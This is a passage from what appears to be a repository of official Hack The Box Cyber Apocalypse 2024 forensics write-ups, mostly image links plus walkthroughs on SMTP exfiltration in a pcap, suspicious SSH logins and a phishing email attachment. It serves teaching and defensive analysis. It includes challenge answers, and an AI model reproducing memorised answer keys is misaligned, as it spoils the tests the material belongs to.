https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup2.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup3.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/banner.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The 
Tracks/assets/images/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/htb.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q1.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q2.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q3.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q4.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q5.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q5.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q6.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q7.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q8.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q9.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/banner.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/chainsaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/chainsaw.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/cyberchef.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/decrypt-quarantine-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/decrypt-quarantine-file.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/decrypt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/decrypt.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/firstlook.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/firstlook.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/intel-prefetch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/intel-prefetch.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/intel-securitylog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/intel-securitylog.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/log-quarantine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] 
Confinement/assets/log-quarantine.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwsh-command1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwsh-command1.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwsh-command2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwsh-command2.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwshlog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwshlog.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/ransomnote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/ransomnote.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/rev2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev2.png -------------------------------------------------------------------------------- 
/forensics/[Hard] Confinement/assets/rev3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev3.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/rev4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev4.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/cyberchef.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/htb.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_one.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_one.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_two.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_two.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_two_beautified.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_two_beautified.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/cor20.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/cor20.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/dnspy_debug_options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/dnspy_debug_options.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/dotpeek.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/dotpeek.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/hexedit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/hexedit.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/ilspy.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/ilspy.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/r2r.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/r2r.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/shellcode_range.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/shellcode_range.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/tabs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/tabs.png -------------------------------------------------------------------------------- /forensics/[Medium] Data Siege/assets/images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Data Siege/assets/images/banner.png -------------------------------------------------------------------------------- /forensics/[Medium] Data Siege/assets/images/htb.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Data Siege/assets/images/htb.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/banner.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/example.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/htb.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/shell.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210526796.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210526796.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210539350.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210539350.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210553102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210553102.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210648805.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210648805.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210826562.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210826562.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211242055.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211242055.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211425321.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211425321.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211518078.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211518078.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211611787.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211611787.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211632474.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211632474.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/README.md: -------------------------------------------------------------------------------- 1 | ![](Assets/Images/banner.png) 2 | 3 | 
Phreaky 4 | 5 | 1st March 2024 / Document No. D24.102.XX 6 | 7 | Prepared By: sebh24 8 | 9 | Challenge Author(s): sebh24 10 | 11 | Difficulty: Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | Phreaky is an easy forensics challenge involving detecting SMTP exfiltration and reconstructing the exfiltrated file to retrieve the flag. 18 | 19 | ## Description 20 | 21 | In the shadowed realm where the Phreaks hold sway, A mole lurks within leading them astray. Sending keys to the Talents, so sly and so slick, A network packet capture must reveal the trick. Through data and bytes, the sleuth seeks the sign, Decrypting messages, crossing the line. The traitor unveiled, with nowhere to hide, Betrayal confirmed, they'd no longer abide. 22 | 23 | ## Skills Required 24 | 25 | * Familiarity with network protocol analyzers 26 | 27 | ## Skills Learned 28 | 29 | * Detecting SMTP exfiltration 30 | * Analyzing the SMTP protocol 31 | * Reconstructing files 32 | 33 | # Enumeration 34 | 35 | The following artifact is provided (this write-up does not list its file hash): 36 | 37 | - phreaky.pcap 38 | 39 | ## Analysis 40 | 41 | We are provided with a pcap and a scenario to locate the insider threat within the Phreaks. As with any packet capture, we first import it into the Brim tool to locate the conversations and hosts it contains. 42 | 43 | ![image-20240307210526796](./assets/image-20240307210526796.png) 44 | 45 | 46 | 47 | ![image-20240307210539350](./assets/image-20240307210539350.png) 48 | 49 | ![image-20240307210553102](./assets/image-20240307210553102.png) 50 | 51 | We see a wide variety of traffic, with a particularly large amount on port 25 (SMTP). Delving into the File Activity tab we locate numerous zip files, seemingly sent as hash values. 52 | 53 | ![image-20240307210648805](./assets/image-20240307210648805.png) 54 | 55 | Selecting the Wireshark symbol, we are able to open the relevant packets in Wireshark and view the TCP stream.
56 | 57 | ![image-20240307210826562](./assets/image-20240307210826562.png) 58 | 59 | It seems the zip files are sent by email from Caleb within the Phreaks to the resources email address within The Talents. This looks like a potential insider threat to me. Interestingly, each email also carries a password. Because the password travels in the same readable SMTP message as the archive, protecting the zip with it hides nothing from anyone who can capture the traffic. 60 | 61 | # Solution 62 | 63 | We next import our PCAP into Network Miner, which extracts the emails and zip files into a folder, and we can import each of the emails into an email client. 64 | 65 | ![image-20240307211242055](./assets/image-20240307211242055.png) 66 | 67 | We can see that each email is associated with a password, and that the password opens the relevant zip file. This indicates Caleb attempted to avoid detection by sending the specific file in zipped chunks. 68 | 69 | ![image-20240307211425321](./assets/image-20240307211425321.png) 70 | 71 | We now have unzipped all the zip files sent via email. 72 | 73 | ![image-20240307211518078](./assets/image-20240307211518078.png) 74 | 75 | The files look to be in 15 parts, which we can join utilizing fjoiner.exe: 76 | 77 | ![image-20240307211611787](./assets/image-20240307211611787.png) 78 | 79 | And the flag is located! 80 | 81 | ![image-20240307211632474](./assets/image-20240307211632474.png) 82 | -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/README.md: -------------------------------------------------------------------------------- 1 | ![](assets/banner.png) 2 | 3 | An unusual sighting 4 | 5 | 29th February 2024 / Document No. 
D24.102.XX 6 | 7 | Prepared By: c4n0pus 8 | 9 | Challenge Author(s): c4n0pus 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | A very easy challenge built around SSH logs and Bash history. 18 | 19 | ## Description 20 | 21 | * As the preparations come to an end, and The Fray draws near each day, our newly established team has started work on refactoring the new CMS application for the competition. However, after some time we noticed that a lot of our work mysteriously has been disappearing! We managed to extract the SSH Logs and the Bash History from our dev server in question. The faction that manages to uncover the perpetrator will have a massive bonus come the competition! Note: Operating Hours of Korp: 0900 - 1900 22 | 23 | ## Skills Required 24 | 25 | * Linux basics 26 | 27 | ## Skills Learned 28 | 29 | * SSH Logs 30 | * Bash History 31 | 32 | ## Q1: "What is the IP Address and Port of the SSH Server (IP:PORT)" 33 | 34 | ## A1: 100.107.36.130:2221 35 | 36 | From the SSH logs, we can take any line that records an inbound connection; the address and port after `on` are the server's: `Connection from 101.111.18.92 port 44711 on 100.107.36.130 port 2221` 37 | 38 | ## Q2: "What time is the first successful Login" 39 | 40 | ## A2: 2024-02-13 11:29:50 41 | 42 | ```txt 43 | [2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2 44 | [2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0 45 | ``` 46 | 47 | ## Q3: "What is the time of the unusual Login" 48 | 49 | ## A3: 2024-02-19 04:00:14 50 | 51 | We know Korp's hours of operation are 0900 - 1900, so an SSH login at 0400 in the morning is suspicious; it also comes from a different source address than the first login shown above. 52 | 53 | ```txt 54 | [2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0 55 | ``` 56 | 57 | ## Q4: "What is the Fingerprint of the attacker's public key" 58 | 59 | ## A4: OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4 60 | 61 | Taken from the logs: `ECDSA 
SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1` (the line as quoted here is cut short; the full fingerprint is the value given in A4) 62 | 63 | ## Q5: "What is the first command the attacker executed after logging in" 64 | 65 | ## A5: whoami 66 | 67 | From the bash history file: `[2024-02-19 04:00:18] whoami` 68 | 69 | ## Q6: "What is the final command the attacker executed before logging out" 70 | 71 | ## A6: ./setup 72 | 73 | From the bash history file: `[2024-02-19 04:14:02] ./setup` 74 | -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] An unusual sighting/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] An unusual sighting/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/htb.png 
-------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/image.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/README.md: -------------------------------------------------------------------------------- 1 | ![](assets/banner.png) 2 | 3 | Urgent 4 | 5 | 29th February 2024 / Document No. D24.102.XX 6 | 7 | Prepared By: thewildspirit 8 | 9 | Challenge Author(s): thewildspirit 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | A very easy forensics challenge that involves extracting and base64-decoding an attachment from an email conversation and URL-decoding the final payload. 18 | 19 | ## Description 20 | 21 | * In the midst of Cybercity's "Fray," a phishing attack targets its factions, sparking chaos. As they decode the email, cyber sleuths race to trace its source, under a tight deadline. Their mission: unmask the attacker and restore order to the city. In the neon-lit streets, the battle for cyber justice unfolds, determining the factions' destiny. 22 | 23 | ## Skills Required 24 | 25 | * Basic decoding knowledge 26 | 27 | ## Skills Learned 28 | 29 | * Base64 decoding 30 | * URL decoding 31 | * Extracting attachments from eml files 32 | 33 | # Enumeration 34 | 35 | Players are given a file named `Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml` which is an email conversation. 36 | 37 | We can use any text editor to inspect this file. Its content is the following. 
38 | 39 | ![](assets/conv.png) 40 | 41 | We can easily find some important information, such as: 42 | 43 | * The sender: `anonmember1337@protonmail.com` 44 | * The receiver: `factiongroups@gmail.com` 45 | 46 | Let us find the actual content of the mail. There are two blocks. The first block contains the following headers: 47 | 48 | * Content-Type: text/html;charset=utf-8 49 | * Content-Transfer-Encoding: base64 50 | 51 | So we know that it is probably some kind of text, and since we know the encoding (base64) let us use cyberchef to decode it. 52 | 53 | ![](assets/cyberchef1.png) 54 | 55 | The full conversation can be found here: 56 | 57 | ![](assets/conv_full.png) 58 | 59 | For the next block, we have the following headers: 60 | 61 | * Content-Type: text/html; filename="onlineform.html"; name="onlineform.html" 62 | * Content-Transfer-Encoding: base64 63 | * Content-Disposition: attachment; filename="onlineform.html"; name="onlineform.html" 64 | 65 | So we know that the encoding is base64 and it is an attachment. Again, using cyberchef we will decode the file. 66 | 67 | ![](assets/cyberchef2.png) 68 | 69 | The full html page can be found here: 70 | 71 | ![](assets/html.png) 72 | 73 | # Solution 74 | 75 | Cyberchef can detect the last encoding which is `URL encoding`. 
76 | 77 | ![](assets/flag.png) 78 | -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/conv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/conv.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/conv_full.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/conv_full.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/cyberchef1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/cyberchef1.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/cyberchef2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/cyberchef2.png -------------------------------------------------------------------------------- /forensics/[Very Easy] 
